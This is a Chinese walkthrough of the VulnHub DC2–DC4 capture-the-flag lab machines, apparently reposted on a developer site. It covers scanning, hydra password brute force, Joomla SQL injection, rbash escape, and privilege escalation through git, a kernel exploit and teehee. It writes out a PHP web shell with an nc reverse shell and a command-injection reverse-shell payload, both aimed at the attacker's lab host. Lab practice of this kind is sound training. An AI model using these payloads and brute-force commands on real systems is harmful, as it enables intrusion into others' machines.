DC2-DC4:vulnhub靶机渗透测试

栏目: 编程工具 · 发布时间: 5年前

内容简介:dc1-dc6靶机下载地址:DC2靶机ip:192.168.56.160

DC2-DC4:vulnhub靶机渗透测试

靶机环境及下载

dc1-dc6靶机下载地址: http://www.five86.com/

DC2靶机ip:192.168.56.160

DC3靶机ip:192.168.56.161

DC4靶机ip:192.168.56.162

说明:获取目标主机的flag

知识点

nmap扫描

hydra爆破

cewl密码生成

git shell

joomla SQL注入

linux拒绝服务提权

命令注入

teehee root shell

渗透测试

第一步使用nmap扫描目标网络端口服务

namp -A 192.168.56.160

DC2-DC4:vulnhub靶机渗透测试

经扫描目标只开放80端口,从扫描结果看出还需要设置hosts文件才能访问,添加好hosts

DC2-DC4:vulnhub靶机渗透测试

访问 http://dc-2 页面是一个wordpress,看见了flag1,flag1给出提示密码在这页面上

使用cewl生成密码

cewl -w dc2_passwords.txt http://dc-2

有密码了但没有用户名呀,wpscan扫描

DC2-DC4:vulnhub靶机渗透测试

扫描结果得到了三个用户名admin,tom,jerry得到用户名和密码之后就开始爆破

hydra -L dc-2_user.txt -P dc-2_password.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

DC2-DC4:vulnhub靶机渗透测试

使用jerry账户登录才能得到flag2

DC2-DC4:vulnhub靶机渗透测试

由于权限的限定不能给他反弹个shell,我再次对目标网络端口进行扫描结果发现了ssh端口7744

使用tom成功登录

ssh tom@192.168.56.160 -p 7744

出现-rbash: id: command not found 参考 https://www.anquanke.com/post/id/173159 里面的绕过

导入$PATH

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

DC2-DC4:vulnhub靶机渗透测试

DC2-DC4:vulnhub靶机渗透测试

切换jerry用户找到了flag4.txt,提示可以git提权参考 https://gtfobins.github.io/gtfobins/git/

DC2-DC4:vulnhub靶机渗透测试

DC2-DC4:vulnhub靶机渗透测试

访问 http://192.168.56.161

DC2-DC4:vulnhub靶机渗透测试

此框架为joomla,使用joomscan工具扫描检测到版本为3.7.0 此版本有个 SQL 注入直接使用 工具 或者手工注入

DC2-DC4:vulnhub靶机渗透测试

得到了admin的hash密码,爆破一下得到密码snoopy,登录,接下来反弹shell

写入代码

<?php

system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 1337 >/tmp/f’);

?>

DC2-DC4:vulnhub靶机渗透测试

访问 http://192.168.56.161/templates/protostar/shell.php 即可反弹shell

查看 linux 版本lsb_relase -a

DC2-DC4:vulnhub靶机渗透测试

接下来使用 linux拒绝服务漏洞进行提权

DC2-DC4:vulnhub靶机渗透测试

使用namp扫描

DC2-DC4:vulnhub靶机渗透测试

目标开放了22,80两个端口

访问80端口 http://192.168.56.162

DC2-DC4:vulnhub靶机渗透测试

说用admin登录,而且看出没有什么限制爆破一下

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.162 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

DC2-DC4:vulnhub靶机渗透测试

得到了密码happy,登录之后可以看到能够执行ls -l, du -h,df -h这三个命令,可以看出可能存在命令注入漏洞。

DC2-DC4:vulnhub靶机渗透测试

使用burp抓包,修改radio参数里面的内容,反弹shell

nc -e /bin/sh 192.168.56.1 1234

DC2-DC4:vulnhub靶机渗透测试

在home目录找到三个用户charles, jim,sam,结果在jim用户下找到一个password文件

DC2-DC4:vulnhub靶机渗透测试

复制下来进行爆破

hydra -L dc4-user.txt -P dc4-password.txt -t 6 ssh://192.168.56.162

DC2-DC4:vulnhub靶机渗透测试

切换为jim用户,读取用户下的mbox,为一个邮件

DC2-DC4:vulnhub靶机渗透测试

去/var/mail/下得到charles的密码

DC2-DC4:vulnhub靶机渗透测试

再次切换用户

DC2-DC4:vulnhub靶机渗透测试

sudo -l 却提示可以看到可以使用teehee进行root shell,将他写入crontab计划任务中

DC2-DC4:vulnhub靶机渗透测试


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

自制搜索引擎

自制搜索引擎

[日]山田浩之、[日]末永匡 / 胡屹 / 人民邮电出版社 / 2016-1 / 39.00元

《自制搜索引擎》聚焦于Google和Yahoo!等Web搜索服务幕后的搜索引擎系统,首先讲解了搜索引擎的基础知识和原理,接着以现实中的开源搜索引擎Senna/Groonga为示例,使用该引擎的源代码引导读者亲自体验搜索引擎的开发过程。这部分讲解涉及了倒排索引的制作和压缩、检索的处理流程以及搜索引擎的优化等内容。又简单介绍了一些更加专业的搜索引擎的知识和要点,为读者今后进一步学习打下了基础。本书适合......一起来看看 《自制搜索引擎》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具